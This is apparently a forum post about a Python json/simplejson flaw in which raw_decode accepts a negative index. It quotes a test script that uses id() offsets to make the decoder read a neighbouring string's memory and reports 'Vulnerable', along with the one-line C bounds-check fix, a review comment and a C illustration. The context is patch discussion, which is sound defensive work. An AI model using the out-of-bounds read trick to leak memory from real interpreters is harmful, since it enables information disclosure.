Originally Posted by misiak
Is there a Python maintainer in the CSSU team?

https://hackerone.com/reports/12297 - security issue found in python (2.7 and newer for sure, I'm not sure if 2.5 is also vulnerable - I couldn't run the sample code to test the issue and I'm not sure which additional python package I should install to run it)
Code:
user:~# cat vulnerability_test.py 
from simplejson import JSONDecoder
j = JSONDecoder()

a = '128931233'
b = "472389423"

if id(a) < id(b):
     x = a
     y = b
else:
     x = b
     y = a

diff = id(x) - id(y)

try:
     j.raw_decode(y, diff)
     print("Vulnerable")
except:
     print("Not vulnerable")

user:~# python
Python 2.5.4 (r254:67916, May 17 2010, 21:00:32) 
[GCC 4.2.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> execfile("vulnerability_test.py")
Vulnerable
>>>
Assuming I tested it the correct way....

My desktop versions of python (3.3.5 and 2.7.6, importing json instead of simplejson) also report vulnerability at this moment. AFAIK there are no 2.5 patches available (only 2.7 and 3.x), as it is no longer supported.

The fix itself looks simple (in some json related code):
Code:
-    if (idx >= length) {
+    if ( idx < 0 || idx >= length) {
 
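Review bot: on the added line "if ( idx < 0 || idx >= length) {", a negative idx now takes the same branch as an index past the end, and the body of that branch is not visible in this hunk, so please confirm that what it reports for the past-the-end case is also the right result for a negative index. The idx < 0 test only has an effect if idx is a signed type at this point, which the hunk does not show either. As a style point, the space after the opening parenthesis differs from the line being replaced; "if (idx < 0 || idx >= length) {" would match it. A regression test that passes a negative index to the decoder would be a useful addition alongside this change.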

The Following 5 Users Say Thank You to ade For This Useful Post:
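To show what the one-line fix quoted in the post changes, here is an added illustration in C (not code from the post, from Python or from simplejson). The arena buffer, the offsets and the scan_number function are constructed for this example; the two digit strings are the ones from the test script.

```c
/* Added illustration of the bounds check in the diff above. The arena,
   offsets and function names are constructed for this example. */
#include <stddef.h>
#include <stdio.h>

/* One array stands in for two neighbouring strings, so a negative index
   relative to the second one still lands in defined memory for the demo. */
static const char arena[32] = "128931233\0\0\0\0\0\0\0" "472389423";
#define Y_OFFSET 16   /* start of the second string inside arena */
#define Y_LENGTH 9

/* Parse the decimal number in str starting at idx. Returns 0 and stores the
   value on success, -1 if idx is rejected or no digit is found there.
   patched != 0 applies the '+' line of the diff, 0 applies the '-' line. */
static int scan_number(const char *str, ptrdiff_t length, ptrdiff_t idx,
                       int patched, long *out)
{
    long value = 0;

    if (patched) {
        if (idx < 0 || idx >= length)   /* '+' line: lower and upper bound */
            return -1;
    } else {
        if (idx >= length)              /* '-' line: upper bound only */
            return -1;
    }
    if (str[idx] < '0' || str[idx] > '9')
        return -1;
    /* Consume digits; with a negative idx these bytes lie before str. */
    for (; str[idx] >= '0' && str[idx] <= '9'; idx++)
        value = value * 10 + (str[idx] - '0');
    *out = value;
    return 0;
}

int main(void)
{
    const char *y = arena + Y_OFFSET;
    long v = 0;
    int rc;

    rc = scan_number(y, Y_LENGTH, -Y_OFFSET, 0, &v);
    printf("old check, idx=%d: rc=%d value=%ld\n", -Y_OFFSET, rc, v);
    v = 0;
    rc = scan_number(y, Y_LENGTH, -Y_OFFSET, 1, &v);
    printf("new check, idx=%d: rc=%d value=%ld\n", -Y_OFFSET, rc, v);
    return 0;
}
```

With the old check the call on the second string returns the digits of the first one; with the added lower bound the same call is rejected before any byte is read.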